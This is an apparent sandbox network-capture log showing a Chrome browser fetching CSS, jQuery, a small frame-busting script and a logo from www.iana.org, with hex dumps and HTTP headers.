                            2024-10-10 08:17:12 UTC4080INData Raw: 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 7d 0a 0a 2e 73 74 61 74 75 73 2d 62 6c 75 65 2c 20 2e 73 74 61 74 75 73 2d 67 72 65 79 2c 20 2e 73 74 61 74 75 73 2d 67 72 65 65 6e 20 7b 0a 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 31 31 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 33 70 78 20 39 70 78 3b 0a 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 30 70 74 3b 0a 7d 0a 0a 2e 73 74 61 74 75 73 2d 62 6c 75 65 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 62 63 64 61 65 64 3b 0a 7d 0a 0a 2e 73 74 61 74 75 73 2d 67 72 65 65 6e 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 62 63 65 64 63 33 3b 0a 7d 0a 0a 2e 73 74 61 74 75 73 2d 67 72 65 79 20 7b 0a 20 20 62 61 63 6b 67 72 6f 75
                            Data Ascii: : none; }}.status-blue, .status-grey, .status-green { white-space: nowrap; border-radius: 11px; padding: 3px 9px; font-size: 10pt;}.status-blue { background: #bcdaed;}.status-green { background: #bcedc3;}.status-grey { backgrou
                            2024-10-10 08:17:12 UTC16384INData Raw: 65 63 74 69 6f 6e 20 7b 0a 20 20 70 61 64 64 69 6e 67 3a 20 35 70 78 20 30 70 78 20 35 70 78 20 30 3b 0a 7d 0a 23 66 6f 6f 74 65 72 20 2e 6e 61 76 69 67 61 74 69 6f 6e 20 74 64 2e 73 75 62 73 65 63 74 69 6f 6e 20 61 3a 6c 69 6e 6b 2c 20 23 66 6f 6f 74 65 72 20 2e 6e 61 76 69 67 61 74 69 6f 6e 20 74 64 2e 73 75 62 73 65 63 74 69 6f 6e 20 61 3a 76 69 73 69 74 65 64 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 23 39 39 39 39 61 30 3b 0a 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 7d 0a 23 66 6f 6f 74 65 72 20 2e 6e 61 76 69 67 61 74 69 6f 6e 20 74 64 2e 73 75 62 73 65 63 74 69 6f 6e 20 61 3a 68 6f 76 65 72 20 7b 0a 20 20 63 6f 6c 6f 72 3a 20 72 67 62 61 28 39 32 2c 20 31 36 36 2c 20 32 31 30 2c 20 30 2e 38 29 3b 0a 20 20 2d 77 65 62 6b
                            Data Ascii: ection { padding: 5px 0px 5px 0;}#footer .navigation td.subsection a:link, #footer .navigation td.subsection a:visited { color: #9999a0; text-decoration: none;}#footer .navigation td.subsection a:hover { color: rgba(92, 166, 210, 0.8); -webk
                            2024-10-10 08:17:12 UTC2656INData Raw: 34 70 78 20 30 20 72 67 62 61 28 30 2c 20 30 2c 20 30 2c 20 30 2e 31 36 29 3b 0a 20 20 62 6f 72 64 65 72 2d 72 61 64 69 75 73 3a 20 38 70 78 3b 0a 7d 0a 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2d 61 61 67 2d 70 61 6e 65 6c 20 68 33 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 31 30 70 78 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 35 34 35 61 36 34 3b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0a 7d 0a 2e 70 65 72 66 6f 72 6d 61 6e 63 65 2d 61 61 67 2d 70 61 6e 65 6c 20 74 61 62 6c 65 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 31 30 70 78 3b 0a 7d 0a 0a 23 70 65 72 66 6f 72 6d 61 6e 63 65 2d 72 65 70 6f 72 74 2d 67 72 69 64 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 67 72 69 64 3b 0a 20 20 67 72 69 64 2d 67 61 70 3a 20 32 35 70 78 3b 0a 20 20 6f 76 65 72 66 6c
                            Data Ascii: 4px 0 rgba(0, 0, 0, 0.16); border-radius: 8px;}.performance-aag-panel h3 { margin: 10px; color: #545a64; font-weight: 500;}.performance-aag-panel table { margin: 10px;}#performance-report-grid { display: grid; grid-gap: 25px; overfl
                            2024-10-10 08:17:12 UTC8160INData Raw: 23 38 38 38 3b 0a 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 31 35 70 78 3b 0a 7d 0a 2e 63 65 72 65 6d 6f 6e 79 2d 61 67 65 6e 64 61 20 74 64 20 7b 0a 20 20 70 61 64 64 69 6e 67 3a 20 34 70 78 20 38 70 78 20 34 70 78 20 34 70 78 3b 0a 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 74 6f 70 3b 0a 7d 0a 40 6d 65 64 69 61 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 61 78 2d 77 69 64 74 68 3a 20 31 30 30 30 70 78 29 20 7b 0a 20 20 2e 63 65 72 65 6d 6f 6e 79 2d 61 67 65 6e 64 61 20 74 64 20 7b 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 20 32 70 78 20 30 70 78 3b 0a 20 20 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 74 6f 70 3b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 62 6c 6f 63 6b 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30
                            Data Ascii: #888; margin-bottom: 15px;}.ceremony-agenda td { padding: 4px 8px 4px 4px; vertical-align: top;}@media only screen and (max-width: 1000px) { .ceremony-agenda td { padding: 2px 0px; vertical-align: top; display: block; margin: 0
                            2024-10-10 08:17:12 UTC2720INData Raw: 0a 20 20 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 0a 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0a 20 20 63 6f 6c 6f 72 3a 20 23 62 65 62 65 62 65 3b 0a 7d 0a 2e 6e 65 77 73 2d 70 61 6e 65 6c 20 2e 6e 65 77 73 2d 73 75 6d 6d 61 72 79 20 70 20 7b 0a 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 7d 0a 0a 23 73 65 61 72 63 68 2d 62 6f 64 79 20 7b 0a 20 20 6d 69 6e 2d 68 65 69 67 68 74 3a 20 34 35 30 70 78 3b 0a 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 7d 0a 23 73 65 61 72 63 68 2d 62 6f 64 79 20 2e 73 65 61 72 63 68 20 7b 0a 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69
                            Data Ascii: vertical-align: middle; display: inline-block; margin: 0px; padding: 0px; color: #bebebe;}.news-panel .news-summary p { margin: 0;}#search-body { min-height: 450px; padding: 0;}#search-body .search { display: flex; flex-directi
                            2024-10-10 08:17:12 UTC135INData Raw: 65 72 2e 73 76 67 29 20 6e 6f 2d 72 65 70 65 61 74 20 63 65 6e 74 65 72 3b 0a 20 20 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 3b 0a 7d 0a 0a 2e 66 77 2d 62 6f 6c 64 20 7b 0a 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 37 30 30 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 7d 0a 0a 2f 2a 23 20 73 6f 75 72 63 65 4d 61 70 70 69 6e 67 55 52 4c 3d 69 61 6e 61 5f 77 65 62 73 69 74 65 2e 63 73 73 2e 6d 61 70 20 2a 2f 0a
                            Data Ascii: er.svg) no-repeat center; border: none;}.fw-bold { font-weight: 700 !important;}/*# sourceMappingURL=iana_website.css.map */


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            7192.168.2.449757192.0.46.84431360C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-10-10 08:17:12 UTC489OUTGET /_js/jquery.js HTTP/1.1
                            Host: www.iana.org
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: */*
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: no-cors
                            Sec-Fetch-Dest: script
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-10-10 08:17:12 UTC1081INHTTP/1.1 200 OK
                            Date: Thu, 10 Oct 2024 08:17:12 GMT
                            Server: Apache
                            Vary: Accept-Encoding
                            Last-Modified: Fri, 24 Sep 2021 20:20:55 GMT
                            Content-Length: 89501
                            X-Frame-Options: DENY
                            X-Content-Type-Options: nosniff
                            Referrer-Policy: same-origin
                            Cross-Origin-Opener-Policy: same-origin
                            Expires: Thu, 10 Oct 2024 08:33:48 GMT
                            X-Content-Type-Options: nosniff
                            Age: 804
                            Content-Type: text/javascript
                            Cache-Control: public, s-maxage=86402, max-age=604814
                            Content-Security-Policy: upgrade-insecure-requests; default-src 'self' https://*.iana.org; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.google.com https://cse.google.com https://clients1.google.com; style-src 'self' 'unsafe-inline' https://www.google.com; child-src 'self' https://www.youtube.com https://clients1.google.com https://cse.google.com https://www.google.com/; img-src 'self' https://data.iana.org https://www.iana.org https://www.google.com https://www.googleapis.com https://clients1.google.com https://*.gstatic.com;
                            Connection: close
                            Strict-Transport-Security: max-age=48211200; preload
                            2024-10-10 08:17:12 UTC12573INData Raw: 2f 2a 21 20 6a 51 75 65 72 79 20 76 33 2e 36 2e 30 20 7c 20 28 63 29 20 4f 70 65 6e 4a 53 20 46 6f 75 6e 64 61 74 69 6f 6e 20 61 6e 64 20 6f 74 68 65 72 20 63 6f 6e 74 72 69 62 75 74 6f 72 73 20 7c 20 6a 71 75 65 72 79 2e 6f 72 67 2f 6c 69 63 65 6e 73 65 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 22 75 73 65 20 73 74 72 69 63 74 22 3b 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3f 6d 6f 64 75 6c 65 2e 65 78 70 6f 72 74 73 3d 65 2e 64 6f 63 75 6d 65 6e 74 3f 74 28 65 2c 21 30 29 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 69 66 28 21 65 2e 64 6f 63 75 6d 65 6e 74 29 74 68 72 6f 77 20 6e 65 77 20 45 72 72 6f 72 28 22 6a 51 75
                            Data Ascii: /*! jQuery v3.6.0 | (c) OpenJS Foundation and other contributors | jquery.org/license */!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQu
                            2024-10-10 08:17:12 UTC1360INData Raw: 44 6f 63 75 6d 65 6e 74 50 6f 73 69 74 69 6f 6e 28 65 29 3d 3d 3d 6e 3f 65 3d 3d 43 7c 7c 65 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 65 29 3f 2d 31 3a 74 3d 3d 43 7c 7c 74 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 3d 3d 70 26 26 79 28 70 2c 74 29 3f 31 3a 75 3f 50 28 75 2c 65 29 2d 50 28 75 2c 74 29 3a 30 3a 34 26 6e 3f 2d 31 3a 31 29 7d 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 29 7b 69 66 28 65 3d 3d 3d 74 29 72 65 74 75 72 6e 20 6c 3d 21 30 2c 30 3b 76 61 72 20 6e 2c 72 3d 30 2c 69 3d 65 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 6f 3d 74 2e 70 61 72 65 6e 74 4e 6f 64 65 2c 61 3d 5b 65 5d 2c 73 3d 5b 74 5d 3b 69 66 28 21 69 7c 7c 21 6f 29 72 65 74 75 72 6e 20 65 3d 3d 43 3f 2d 31 3a 74 3d 3d 43 3f 31 3a 69 3f 2d 31 3a 6f 3f 31 3a 75
                            Data Ascii: DocumentPosition(e)===n?e==C||e.ownerDocument==p&&y(p,e)?-1:t==C||t.ownerDocument==p&&y(p,t)?1:u?P(u,e)-P(u,t):0:4&n?-1:1)}:function(e,t){if(e===t)return l=!0,0;var n,r=0,i=e.parentNode,o=t.parentNode,a=[e],s=[t];if(!i||!o)return e==C?-1:t==C?1:i?-1:o?1:u
                            2024-10-10 08:17:12 UTC10880INData Raw: 77 68 69 6c 65 28 72 2d 2d 29 65 2e 73 70 6c 69 63 65 28 6e 5b 72 5d 2c 31 29 7d 72 65 74 75 72 6e 20 75 3d 6e 75 6c 6c 2c 65 7d 2c 6f 3d 73 65 2e 67 65 74 54 65 78 74 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 3d 22 22 2c 72 3d 30 2c 69 3d 65 2e 6e 6f 64 65 54 79 70 65 3b 69 66 28 69 29 7b 69 66 28 31 3d 3d 3d 69 7c 7c 39 3d 3d 3d 69 7c 7c 31 31 3d 3d 3d 69 29 7b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 65 78 74 43 6f 6e 74 65 6e 74 29 72 65 74 75 72 6e 20 65 2e 74 65 78 74 43 6f 6e 74 65 6e 74 3b 66 6f 72 28 65 3d 65 2e 66 69 72 73 74 43 68 69 6c 64 3b 65 3b 65 3d 65 2e 6e 65 78 74 53 69 62 6c 69 6e 67 29 6e 2b 3d 6f 28 65 29 7d 65 6c 73 65 20 69 66 28 33 3d 3d 3d 69 7c 7c 34 3d 3d 3d 69 29 72 65 74 75 72 6e
                            Data Ascii: while(r--)e.splice(n[r],1)}return u=null,e},o=se.getText=function(e){var t,n="",r=0,i=e.nodeType;if(i){if(1===i||9===i||11===i){if("string"==typeof e.textContent)return e.textContent;for(e=e.firstChild;e;e=e.nextSibling)n+=o(e)}else if(3===i||4===i)return
                            2024-10-10 08:17:12 UTC14960INData Raw: 54 79 70 65 3f 53 2e 66 69 6e 64 2e 6d 61 74 63 68 65 73 53 65 6c 65 63 74 6f 72 28 72 2c 65 29 3f 5b 72 5d 3a 5b 5d 3a 53 2e 66 69 6e 64 2e 6d 61 74 63 68 65 73 28 65 2c 53 2e 67 72 65 70 28 74 2c 66 75 6e 63 74 69 6f 6e 28 65 29 7b 72 65 74 75 72 6e 20 31 3d 3d 3d 65 2e 6e 6f 64 65 54 79 70 65 7d 29 29 7d 2c 53 2e 66 6e 2e 65 78 74 65 6e 64 28 7b 66 69 6e 64 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 2c 72 3d 74 68 69 73 2e 6c 65 6e 67 74 68 2c 69 3d 74 68 69 73 3b 69 66 28 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 65 29 72 65 74 75 72 6e 20 74 68 69 73 2e 70 75 73 68 53 74 61 63 6b 28 53 28 65 29 2e 66 69 6c 74 65 72 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 6f 72 28 74 3d 30 3b 74 3c 72 3b 74 2b 2b 29 69 66 28 53 2e 63 6f 6e 74
                            Data Ascii: Type?S.find.matchesSelector(r,e)?[r]:[]:S.find.matches(e,S.grep(t,function(e){return 1===e.nodeType}))},S.fn.extend({find:function(e){var t,n,r=this.length,i=this;if("string"!=typeof e)return this.pushStack(S(e).filter(function(){for(t=0;t<r;t++)if(S.cont
                            2024-10-10 08:17:12 UTC6800INData Raw: 65 29 7b 7d 7d 28 29 3d 3d 28 22 66 6f 63 75 73 22 3d 3d 3d 74 29 7d 66 75 6e 63 74 69 6f 6e 20 45 65 28 65 2c 74 2c 6e 2c 72 2c 69 2c 6f 29 7b 76 61 72 20 61 2c 73 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 74 29 7b 66 6f 72 28 73 20 69 6e 22 73 74 72 69 6e 67 22 21 3d 74 79 70 65 6f 66 20 6e 26 26 28 72 3d 72 7c 7c 6e 2c 6e 3d 76 6f 69 64 20 30 29 2c 74 29 45 65 28 65 2c 73 2c 6e 2c 72 2c 74 5b 73 5d 2c 6f 29 3b 72 65 74 75 72 6e 20 65 7d 69 66 28 6e 75 6c 6c 3d 3d 72 26 26 6e 75 6c 6c 3d 3d 69 3f 28 69 3d 6e 2c 72 3d 6e 3d 76 6f 69 64 20 30 29 3a 6e 75 6c 6c 3d 3d 69 26 26 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 6e 3f 28 69 3d 72 2c 72 3d 76 6f 69 64 20 30 29 3a 28 69 3d 72 2c 72 3d 6e 2c 6e 3d 76 6f 69 64 20 30 29 29
                            Data Ascii: e){}}()==("focus"===t)}function Ee(e,t,n,r,i,o){var a,s;if("object"==typeof t){for(s in"string"!=typeof n&&(r=r||n,n=void 0),t)Ee(e,s,n,r,t[s],o);return e}if(null==r&&null==i?(i=n,r=n=void 0):null==i&&("string"==typeof n?(i=r,r=void 0):(i=r,r=n,n=void 0))
                            2024-10-10 08:17:12 UTC16384INData Raw: 65 2c 74 3d 72 2e 68 61 6e 64 6c 65 72 2e 61 70 70 6c 79 28 74 68 69 73 2c 61 72 67 75 6d 65 6e 74 73 29 2c 65 2e 74 79 70 65 3d 69 29 2c 74 7d 7d 7d 29 2c 53 2e 66 6e 2e 65 78 74 65 6e 64 28 7b 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 72 65 74 75 72 6e 20 45 65 28 74 68 69 73 2c 65 2c 74 2c 6e 2c 72 29 7d 2c 6f 6e 65 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 72 65 74 75 72 6e 20 45 65 28 74 68 69 73 2c 65 2c 74 2c 6e 2c 72 2c 31 29 7d 2c 6f 66 66 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 29 7b 76 61 72 20 72 2c 69 3b 69 66 28 65 26 26 65 2e 70 72 65 76 65 6e 74 44 65 66 61 75 6c 74 26 26 65 2e 68 61 6e 64 6c 65 4f 62 6a 29 72 65 74 75 72 6e 20 72 3d 65 2e 68 61 6e 64 6c 65 4f 62 6a 2c 53 28 65 2e 64 65 6c 65 67 61
                            Data Ascii: e,t=r.handler.apply(this,arguments),e.type=i),t}}}),S.fn.extend({on:function(e,t,n,r){return Ee(this,e,t,n,r)},one:function(e,t,n,r){return Ee(this,e,t,n,r,1)},off:function(e,t,n){var r,i;if(e&&e.preventDefault&&e.handleObj)return r=e.handleObj,S(e.delega
                            2024-10-10 08:17:12 UTC6736INData Raw: 74 65 2c 72 2e 63 6f 6d 70 6c 65 74 65 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 6d 28 72 2e 6f 6c 64 29 26 26 72 2e 6f 6c 64 2e 63 61 6c 6c 28 74 68 69 73 29 2c 72 2e 71 75 65 75 65 26 26 53 2e 64 65 71 75 65 75 65 28 74 68 69 73 2c 72 2e 71 75 65 75 65 29 7d 2c 72 7d 2c 53 2e 66 6e 2e 65 78 74 65 6e 64 28 7b 66 61 64 65 54 6f 3a 66 75 6e 63 74 69 6f 6e 28 65 2c 74 2c 6e 2c 72 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 66 69 6c 74 65 72 28 61 65 29 2e 63 73 73 28 22 6f 70 61 63 69 74 79 22 2c 30 29 2e 73 68 6f 77 28 29 2e 65 6e 64 28 29 2e 61 6e 69 6d 61 74 65 28 7b 6f 70 61 63 69 74 79 3a 74 7d 2c 65 2c 6e 2c 72 29 7d 2c 61 6e 69 6d 61 74 65 3a 66 75 6e 63 74 69 6f 6e 28 74 2c 65 2c 6e 2c 72 29 7b 76 61 72 20 69 3d 53 2e 69 73 45 6d 70 74 79 4f 62 6a 65 63 74
                            Data Ascii: te,r.complete=function(){m(r.old)&&r.old.call(this),r.queue&&S.dequeue(this,r.queue)},r},S.fn.extend({fadeTo:function(e,t,n,r){return this.filter(ae).css("opacity",0).show().end().animate({opacity:t},e,n,r)},animate:function(t,e,n,r){var i=S.isEmptyObject
                            2024-10-10 08:17:12 UTC16384INData Raw: 65 3f 22 22 3a 65 3a 76 6f 69 64 20 30 7d 7d 29 2c 53 2e 65 78 74 65 6e 64 28 7b 76 61 6c 48 6f 6f 6b 73 3a 7b 6f 70 74 69 6f 6e 3a 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 3d 53 2e 66 69 6e 64 2e 61 74 74 72 28 65 2c 22 76 61 6c 75 65 22 29 3b 72 65 74 75 72 6e 20 6e 75 6c 6c 21 3d 74 3f 74 3a 68 74 28 53 2e 74 65 78 74 28 65 29 29 7d 7d 2c 73 65 6c 65 63 74 3a 7b 67 65 74 3a 66 75 6e 63 74 69 6f 6e 28 65 29 7b 76 61 72 20 74 2c 6e 2c 72 2c 69 3d 65 2e 6f 70 74 69 6f 6e 73 2c 6f 3d 65 2e 73 65 6c 65 63 74 65 64 49 6e 64 65 78 2c 61 3d 22 73 65 6c 65 63 74 2d 6f 6e 65 22 3d 3d 3d 65 2e 74 79 70 65 2c 73 3d 61 3f 6e 75 6c 6c 3a 5b 5d 2c 75 3d 61 3f 6f 2b 31 3a 69 2e 6c 65 6e 67 74 68 3b 66 6f 72 28 72 3d 6f 3c 30 3f 75 3a 61 3f 6f
                            Data Ascii: e?"":e:void 0}}),S.extend({valHooks:{option:{get:function(e){var t=S.find.attr(e,"value");return null!=t?t:ht(S.text(e))}},select:{get:function(e){var t,n,r,i=e.options,o=e.selectedIndex,a="select-one"===e.type,s=a?null:[],u=a?o+1:i.length;for(r=o<0?u:a?o
                            2024-10-10 08:17:12 UTC2656INData Raw: 3b 72 65 74 75 72 6e 20 72 3f 72 2e 67 65 74 43 6c 69 65 6e 74 52 65 63 74 73 28 29 2e 6c 65 6e 67 74 68 3f 28 65 3d 72 2e 67 65 74 42 6f 75 6e 64 69 6e 67 43 6c 69 65 6e 74 52 65 63 74 28 29 2c 6e 3d 72 2e 6f 77 6e 65 72 44 6f 63 75 6d 65 6e 74 2e 64 65 66 61 75 6c 74 56 69 65 77 2c 7b 74 6f 70 3a 65 2e 74 6f 70 2b 6e 2e 70 61 67 65 59 4f 66 66 73 65 74 2c 6c 65 66 74 3a 65 2e 6c 65 66 74 2b 6e 2e 70 61 67 65 58 4f 66 66 73 65 74 7d 29 3a 7b 74 6f 70 3a 30 2c 6c 65 66 74 3a 30 7d 3a 76 6f 69 64 20 30 7d 2c 70 6f 73 69 74 69 6f 6e 3a 66 75 6e 63 74 69 6f 6e 28 29 7b 69 66 28 74 68 69 73 5b 30 5d 29 7b 76 61 72 20 65 2c 74 2c 6e 2c 72 3d 74 68 69 73 5b 30 5d 2c 69 3d 7b 74 6f 70 3a 30 2c 6c 65 66 74 3a 30 7d 3b 69 66 28 22 66 69 78 65 64 22 3d 3d 3d 53 2e
                            Data Ascii: ;return r?r.getClientRects().length?(e=r.getBoundingClientRect(),n=r.ownerDocument.defaultView,{top:e.top+n.pageYOffset,left:e.left+n.pageXOffset}):{top:0,left:0}:void 0},position:function(){if(this[0]){var e,t,n,r=this[0],i={top:0,left:0};if("fixed"===S.
                            2024-10-10 08:17:12 UTC768INData Raw: 65 2c 74 29 7b 76 61 72 20 6e 2c 72 2c 69 3b 69 66 28 22 73 74 72 69 6e 67 22 3d 3d 74 79 70 65 6f 66 20 74 26 26 28 6e 3d 65 5b 74 5d 2c 74 3d 65 2c 65 3d 6e 29 2c 6d 28 65 29 29 72 65 74 75 72 6e 20 72 3d 73 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 2c 32 29 2c 28 69 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 65 2e 61 70 70 6c 79 28 74 7c 7c 74 68 69 73 2c 72 2e 63 6f 6e 63 61 74 28 73 2e 63 61 6c 6c 28 61 72 67 75 6d 65 6e 74 73 29 29 29 7d 29 2e 67 75 69 64 3d 65 2e 67 75 69 64 3d 65 2e 67 75 69 64 7c 7c 53 2e 67 75 69 64 2b 2b 2c 69 7d 2c 53 2e 68 6f 6c 64 52 65 61 64 79 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 65 3f 53 2e 72 65 61 64 79 57 61 69 74 2b 2b 3a 53 2e 72 65 61 64 79 28 21 30 29 7d 2c 53 2e 69 73 41 72 72 61 79 3d 41 72 72
                            Data Ascii: e,t){var n,r,i;if("string"==typeof t&&(n=e[t],t=e,e=n),m(e))return r=s.call(arguments,2),(i=function(){return e.apply(t||this,r.concat(s.call(arguments)))}).guid=e.guid=e.guid||S.guid++,i},S.holdReady=function(e){e?S.readyWait++:S.ready(!0)},S.isArray=Arr


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            8192.168.2.449758192.0.46.84431360C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-10-10 08:17:12 UTC487OUTGET /_js/iana.js HTTP/1.1
                            Host: www.iana.org
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: */*
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: no-cors
                            Sec-Fetch-Dest: script
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-10-10 08:17:12 UTC1078INHTTP/1.1 200 OK
                            Date: Thu, 10 Oct 2024 08:17:12 GMT
                            Server: Apache
                            Vary: Accept-Encoding
                            Last-Modified: Fri, 24 Sep 2021 20:20:55 GMT
                            Content-Length: 68
                            X-Frame-Options: DENY
                            X-Content-Type-Options: nosniff
                            Referrer-Policy: same-origin
                            Cross-Origin-Opener-Policy: same-origin
                            Expires: Thu, 10 Oct 2024 08:43:12 GMT
                            X-Content-Type-Options: nosniff
                            Age: 239
                            Content-Type: text/javascript
                            Cache-Control: public, s-maxage=86402, max-age=604814
                            Content-Security-Policy: upgrade-insecure-requests; default-src 'self' https://*.iana.org; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://www.google.com https://cse.google.com https://clients1.google.com; style-src 'self' 'unsafe-inline' https://www.google.com; child-src 'self' https://www.youtube.com https://clients1.google.com https://cse.google.com https://www.google.com/; img-src 'self' https://data.iana.org https://www.iana.org https://www.google.com https://www.googleapis.com https://clients1.google.com https://*.gstatic.com;
                            Connection: close
                            Strict-Transport-Security: max-age=48211200; preload
                            2024-10-10 08:17:12 UTC68INData Raw: 69 66 20 28 74 6f 70 20 21 3d 3d 20 73 65 6c 66 29 20 7b 0a 20 20 20 20 74 6f 70 2e 6c 6f 63 61 74 69 6f 6e 2e 72 65 70 6c 61 63 65 28 73 65 6c 66 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 29 3b 0a 7d 0a
                            Data Ascii: if (top !== self) { top.location.replace(self.location.href);}


                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                            9192.168.2.449755192.0.46.84431360C:\Program Files\Google\Chrome\Application\chrome.exe
                            TimestampBytes transferredDirectionData
                            2024-10-10 08:17:12 UTC566OUTGET /_img/2022/iana-logo-header.svg HTTP/1.1
                            Host: www.iana.org
                            Connection: keep-alive
                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                            sec-ch-ua-mobile: ?0
                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                            sec-ch-ua-platform: "Windows"
                            Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                            Sec-Fetch-Site: cross-site
                            Sec-Fetch-Mode: no-cors
                            Sec-Fetch-Dest: image
                            Accept-Encoding: gzip, deflate, br
                            Accept-Language: en-US,en;q=0.9
                            2024-10-10 08:17:12 UTC1079INHTTP/1.1 200 OK
                            Date: Thu, 10 Oct 2024 08:17:12 GMT
                            Server: Apache
                            Vary: Accept-Encoding
                            Last-Modified: Tue, 05 Oct 2021 16:31:06 GMT
                            Content-Length: 32870
                            X-Frame-Options: DENY
                            X-Content-Type-Options: nosniff
                            Referrer-Policy: same-origin
                            Cross-Origin-Opener-Policy: same-origin
                            Expires: Thu, 10 Oct 2024 08:37:22 GMT
                            X-Content-Type-Options: nosniff
                            Age: 590
                            Content-Type: image/svg+xml
                            Cache-Control: public, s-maxage=86402, max-age=604814
